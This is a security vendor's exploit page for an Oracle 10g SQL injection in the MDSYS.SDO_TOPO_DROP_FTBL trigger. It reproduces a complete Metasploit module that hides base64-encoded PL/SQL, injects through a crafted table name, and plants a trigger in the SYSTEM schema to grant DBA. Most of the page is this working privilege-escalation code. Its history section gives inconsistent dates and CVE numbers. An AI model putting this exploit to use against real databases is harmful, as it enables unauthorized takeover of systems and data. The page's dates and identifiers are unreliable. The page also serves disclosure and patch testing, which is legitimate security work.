Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)

Name Oracle 10g MDSYS.SDO_TOPO_DROP_FTBL SQL Injection Exploit (meta)
Systems Affected Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 and 10.2.0.2
Severity High Risk
Category Escalate Oracle user
Vendor URL http://www.oracle.com/
Credit David Litchfield (davidl at ngssoftware.com)
Exploit http://www.milw0rm.com
Date 18 Feb 2009

Details

Unspecified vulnerability in the Oracle Spatial component in Oracle Database 10.1.0.5 and 10.2.0.2 allows remote authenticated users to affect confidentiality and integrity via unknown vectors. The exploit will escalate an Oracle Database user rights to MDSYS by exploiting an sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. When a user drops a table the trigger fires. The name of the table is embedded in a dynamic SQL query which is then executed by the trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS user by creating evil trigger in SYSTEM scheme (this is 2-stage privilege escalation). Note that the Oracle advisory states that the attacker requires the DROP TABLE and CREATE PROCEDURE privileges. This is not the case and only CREATE SESSION privileges are required.

Example
##
# $Id: droptable_trigger.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger.',
'Description' => %q{
This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in
the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege
given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
},
'Author' => [ 'Sh2kerr ' ],
'License' => MSF_LICENSE,
'Version' => '$Revision:$',
'References' =>
[
[ 'CVE', '2008-3979' ],
[ 'URL', 'http://www.securityfocus.com/archive/1/500061' ],
[ 'URL', 'http://www.ngssoftware.com/' ],
],
'DisclosureDate' => 'Jan 13 2009'))

register_options(
[
OptString.new('SQL', [ false, 'The SQL to execute.', 'GRANT DBA TO SCOTT']),
OptString.new('USER', [ false, 'The current user. ', 'SCOTT']),
OptString.new('FILENAME', [ false, 'The file name.', 'msf.sql']),
OptString.new('OUTPUTPATH', [ false, 'The location of the file.', './data/exploits/']),

], self.class)
end
def run
name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand4 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
rand5 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
function1 = %Q|
CREATE OR REPLACE PROCEDURE #{name1}
AUTHID CURRENT_USER AS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN EXECUTE IMMEDIATE '#{datastore['SQL']}';
END;
|

function2 = %Q|
CREATE OR REPLACE FUNCTION #{name2} RETURN number AUTHID CURRENT_USER is
PRAGMA AUTONOMOUS_TRANSACTION;
STMT VARCHAR2(400):= 'create or replace trigger system.evil_trigger before insert on system.DEF$_TEMP$LOB DECLARE msg VARCHAR2(10);
BEGIN #{datastore['USER']}.#{name1};
end evil_trigger;';
BEGIN
EXECUTE IMMEDIATE STMT;
COMMIT;
RETURN 1;
END;
|

prepare ="create table \"O' and 1=#{datastore['USER']}.#{name2}--\"(id number)"

exploiting1 ="drop table \"O' and 1=#{datastore['USER']}.#{name2}--\""
exploiting2 = "insert into system.DEF$_TEMP$LOB (TEMP$BLOB) VALUES ('AA')"
fun1 = Rex::Text.encode_base64(function1)
fun2 = Rex::Text.encode_base64(function2)
prp = Rex::Text.encode_base64(prepare)
exp1 = Rex::Text.encode_base64(exploiting1)
exp2 = Rex::Text.encode_base64(exploiting2)
sql = %Q|
DECLARE
#{rand1} VARCHAR2(32767);
#{rand2} VARCHAR2(32767);
#{rand3} VARCHAR2(32767);
#{rand4} VARCHAR2(32767);
#{rand5} VARCHAR2(32767);
BEGIN
#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun1}')));
EXECUTE IMMEDIATE #{rand1};
EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name1} TO PUBLIC';
#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{fun2}')));
EXECUTE IMMEDIATE #{rand2};
EXECUTE IMMEDIATE 'GRANT EXECUTE ON #{name2} TO PUBLIC';
#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
EXECUTE IMMEDIATE #{rand3};
#{rand4} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
EXECUTE IMMEDIATE #{rand4};
#{rand5} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp2}')));
EXECUTE IMMEDIATE #{rand5};
END;
/
DROP FUNCTION #{name1};
DROP FUNCTION #{name2};
|

print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(sql)
end
end


Patch Information
Apply the latest Oracle Security patches (e.g. CPU April 2009 )


History
13-jan-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Oracle published CPU April 2009 [CVE-2009-0981]
14-apr-2009 Advisory published



© 2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.